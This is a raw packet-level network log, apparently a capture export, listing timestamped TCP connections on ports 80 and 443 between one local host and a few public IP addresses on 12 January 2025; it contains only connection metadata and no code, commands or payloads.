                                                              Jan 12, 2025 09:27:18.470527887 CET8050315172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:18.674870014 CET44350313104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:18.674957037 CET50313443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:18.675909996 CET50313443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:18.676037073 CET44350313104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:18.676112890 CET50313443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:18.676465034 CET50316443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:18.676507950 CET44350316188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:18.676588058 CET50316443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:18.676625013 CET50316443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:18.676709890 CET44350316188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:18.677191019 CET5031780192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:18.677195072 CET50316443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:18.682024956 CET8050317188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:18.682122946 CET5031780192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:18.682122946 CET5031780192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:18.687010050 CET8050317188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:18.937992096 CET8050315172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:18.938266039 CET8050315172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:18.942250967 CET5031580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:18.961179972 CET5031580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:18.962173939 CET50318443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:18.962249041 CET44350318104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:18.962356091 CET50318443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:18.962393045 CET50318443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:23.618189096 CET50360443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:23.618256092 CET44350360188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:23.618305922 CET50360443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:23.618653059 CET5036180192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:23.623538017 CET8050361188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:23.623615980 CET5036180192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:23.623661995 CET5036180192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:23.629761934 CET8050361188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:24.042653084 CET8050359172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:24.042776108 CET5035980192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:24.043559074 CET8050359172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:24.043571949 CET50362443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:24.043623924 CET44350362104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:24.043642044 CET5035980192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:24.043687105 CET50362443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:24.043720007 CET50362443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:24.043808937 CET44350362104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:24.043863058 CET50362443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:24.044118881 CET5036380192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:24.047621965 CET8050359172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:24.048985004 CET8050363104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:24.049052954 CET5036380192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:24.049115896 CET5036380192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:24.053982019 CET8050363104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:24.096158028 CET8050361188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:24.096343040 CET5036180192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:24.096380949 CET8050361188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:24.096442938 CET5036180192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:24.097198963 CET50364443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:24.097235918 CET44350364172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:24.097296000 CET50364443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:24.097323895 CET50364443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:24.097436905 CET44350364172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:24.097490072 CET50364443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:24.097774982 CET5036580192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:24.101198912 CET8050361188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:24.102598906 CET8050365172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:24.102776051 CET5036580192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:24.102838039 CET5036580192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:24.107594013 CET8050365172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:24.528991938 CET8050363104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:24.529257059 CET5036380192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:24.530121088 CET8050363104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:24.530195951 CET5036380192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:24.532196045 CET50368443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:24.532217026 CET44350368104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:24.532284975 CET50368443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:24.532807112 CET50368443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:24.532819033 CET44350368104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:24.534197092 CET8050363104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:24.561486006 CET8050365172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:24.561634064 CET5036580192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:24.562189102 CET50369443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:24.562208891 CET44350369172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:24.562233925 CET8050365172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:24.562278032 CET50369443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:24.562303066 CET50369443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:24.562308073 CET5036580192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:24.562392950 CET44350369172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:24.562447071 CET50369443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:24.562830925 CET5037080192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:24.566431999 CET8050365172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:24.567667007 CET8050370172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:24.567737103 CET5037080192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:24.567773104 CET5037080192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:24.572541952 CET8050370172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:25.025285006 CET44350368104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:25.025374889 CET50368443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:25.026722908 CET50368443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:25.026792049 CET44350368104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:25.026856899 CET50368443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:25.027462006 CET50371443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:25.027489901 CET44350371188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:25.027555943 CET50371443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:25.027584076 CET50371443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:25.027672052 CET44350371188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:25.027726889 CET50371443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:25.028170109 CET5037280192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:25.033018112 CET8050372188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:25.033092976 CET5037280192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:25.033137083 CET5037280192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:25.037966013 CET8050372188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:25.106439114 CET8050370172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:25.106703043 CET5037080192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:25.106774092 CET8050370172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:25.106827974 CET5037080192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:25.107520103 CET50373443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:25.107623100 CET44350373104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:25.107693911 CET50373443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:25.107769012 CET50373443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:25.107882023 CET44350373104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:25.107954025 CET50373443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:25.108144999 CET5037480192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:25.111548901 CET8050370172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:25.113019943 CET8050374104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:25.113102913 CET5037480192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:25.121336937 CET5037480192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:25.126236916 CET8050374104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:25.508781910 CET8050372188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:25.508971930 CET8050372188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:25.509166956 CET5037280192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:25.509166956 CET5037280192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:25.510060072 CET50375443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:25.510117054 CET44350375172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:25.510302067 CET50375443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:25.510302067 CET50375443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:25.510502100 CET44350375172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:25.510579109 CET50375443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:25.510715008 CET5037680192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:25.514080048 CET8050372188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:25.515515089 CET8050376172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:25.515577078 CET5037680192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:25.515604019 CET5037680192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:25.520365000 CET8050376172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:25.582278013 CET8050374104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:25.582303047 CET8050374104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:25.582429886 CET5037480192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:25.583753109 CET5037480192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:25.585319042 CET50379443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:25.585350990 CET44350379104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:25.585445881 CET50379443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:25.585969925 CET50379443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:25.585985899 CET44350379104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:25.588608027 CET8050374104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:25.968350887 CET8050376172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:25.968452930 CET5037680192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:25.968838930 CET8050376172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:25.968889952 CET5037680192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:25.969219923 CET50380443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:25.969240904 CET44350380172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:25.969372034 CET50380443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:25.969393015 CET50380443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:25.969522953 CET44350380172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:25.969574928 CET50380443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:25.969760895 CET5038180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:25.973237991 CET8050376172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:25.974736929 CET8050381172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:25.974787951 CET5038180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:25.974822998 CET5038180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:25.979624033 CET8050381172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:26.072329998 CET44350379104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:26.072438955 CET50379443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:26.073808908 CET50379443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:26.073884964 CET44350379104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:26.073995113 CET50379443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:26.074470043 CET50382443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:26.074486017 CET44350382188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:26.074553013 CET50382443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:26.074573040 CET50382443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:26.074667931 CET44350382188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:26.074716091 CET50382443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:26.074928999 CET5038380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:26.079766989 CET8050383188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:26.079848051 CET5038380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:26.079870939 CET5038380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:26.084640026 CET8050383188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:26.428056955 CET8050381172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:26.428195000 CET8050381172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:26.428287983 CET5038180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:26.428287983 CET5038180192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:26.429069042 CET50384443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:26.429090023 CET44350384104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:26.429157019 CET50384443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:26.429297924 CET50384443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:26.429389954 CET44350384104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:26.429457903 CET50384443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:26.429737091 CET5038580192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:26.433089018 CET8050381172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:26.434673071 CET8050385104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:26.434745073 CET5038580192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:26.434784889 CET5038580192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:26.439575911 CET8050385104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:26.560540915 CET8050383188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:26.560657024 CET5038380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:26.561309099 CET50386443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:26.561414003 CET44350386172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:26.561466932 CET8050383188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:26.561496973 CET50386443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:26.561518908 CET5038380192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:26.561569929 CET50386443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:26.561669111 CET44350386172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:26.561727047 CET50386443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:26.561907053 CET5038780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:26.565515041 CET8050383188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:26.566705942 CET8050387172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:26.566766024 CET5038780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:26.566898108 CET5038780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:26.571716070 CET8050387172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:26.884705067 CET8050385104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:26.884874105 CET5038580192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:26.885380983 CET8050385104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:26.885639906 CET5038580192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:26.887980938 CET50390443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:26.888072968 CET44350390104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:26.888155937 CET50390443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:26.888680935 CET50390443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:26.888715029 CET44350390104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:26.890120983 CET8050385104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:27.024802923 CET8050387172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:27.024894953 CET5038780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:27.025255919 CET8050387172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:27.025304079 CET5038780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:27.025681019 CET50391443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:27.025715113 CET44350391172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:27.025780916 CET50391443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:27.026108980 CET5039280192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:27.026109934 CET50391443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:27.026150942 CET44350391172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:27.026201010 CET50391443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:27.030771971 CET8050387172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:27.032393932 CET8050392172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:27.032457113 CET5039280192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:27.032485962 CET5039280192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:27.037493944 CET8050392172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:27.371710062 CET44350390104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:27.371921062 CET50390443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:31.740768909 CET8050431172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:31.740833044 CET5043180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:31.741367102 CET50435443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:31.741389990 CET44350435172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:31.741462946 CET50435443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:31.741489887 CET50435443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:31.741590023 CET44350435172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:31.741645098 CET50435443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:31.741966009 CET5043680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:31.745589972 CET8050431172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:31.746752024 CET8050436172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:31.746934891 CET5043680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:31.747020960 CET5043680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:31.751750946 CET8050436172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:32.045361996 CET44350434104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:32.045437098 CET50434443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:32.047177076 CET50434443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:32.047250986 CET44350434104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:32.047310114 CET50434443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:32.047949076 CET50437443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:32.047981977 CET44350437188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:32.048058033 CET50437443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:32.048079967 CET50437443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:32.048152924 CET44350437188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:32.048213005 CET50437443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:32.048815966 CET5043880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:32.053697109 CET8050438188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:32.053772926 CET5043880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:32.053841114 CET5043880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:32.058670044 CET8050438188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:32.222513914 CET8050436172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:32.222608089 CET5043680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:32.222913980 CET8050436172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:32.222966909 CET5043680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:32.223587036 CET50439443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:32.223690033 CET44350439104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:32.223795891 CET50439443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:32.223795891 CET50439443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:32.223992109 CET44350439104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:32.224069118 CET50439443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:32.224323988 CET5044080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:32.227380037 CET8050436172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:32.229214907 CET8050440104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:32.229289055 CET5044080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:32.229324102 CET5044080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:32.234160900 CET8050440104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:32.516098022 CET8050438188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:32.516346931 CET5043880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:32.516824007 CET8050438188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:32.516891956 CET5043880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:32.517030954 CET50441443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:32.517102957 CET44350441172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:32.517187119 CET50441443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:32.517261028 CET50441443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:32.517383099 CET44350441172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:32.517457008 CET50441443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:32.517858982 CET5044280192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:32.521188021 CET8050438188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:32.522697926 CET8050442172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:32.522767067 CET5044280192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:32.522799015 CET5044280192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:32.527537107 CET8050442172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:32.678085089 CET8050440104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:32.679569006 CET8050440104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:32.679760933 CET5044080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:32.685573101 CET5044080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:32.688888073 CET50445443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:32.688983917 CET44350445104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:32.689089060 CET50445443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:32.689898014 CET50445443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:32.689933062 CET44350445104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:32.690387964 CET8050440104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:32.991373062 CET8050442172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:32.991456985 CET5044280192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:32.991545916 CET8050442172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:32.991596937 CET5044280192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:32.992122889 CET50446443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:32.992155075 CET44350446172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:32.992235899 CET50446443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:32.992259026 CET50446443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:32.992367029 CET44350446172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:32.992419004 CET50446443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:32.992728949 CET5044780192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:32.996222019 CET8050442172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:32.997538090 CET8050447172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:32.997591019 CET5044780192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:32.997767925 CET5044780192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:33.002700090 CET8050447172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:33.146089077 CET44350445104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:33.146296978 CET50445443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:33.147229910 CET50445443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:33.147284031 CET44350445104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:33.147349119 CET50445443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:33.147871971 CET50448443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:33.147984982 CET44350448188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:33.148091078 CET50448443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:33.148091078 CET50448443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:33.148271084 CET44350448188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:33.148325920 CET50448443192.168.2.7188.114.97.3
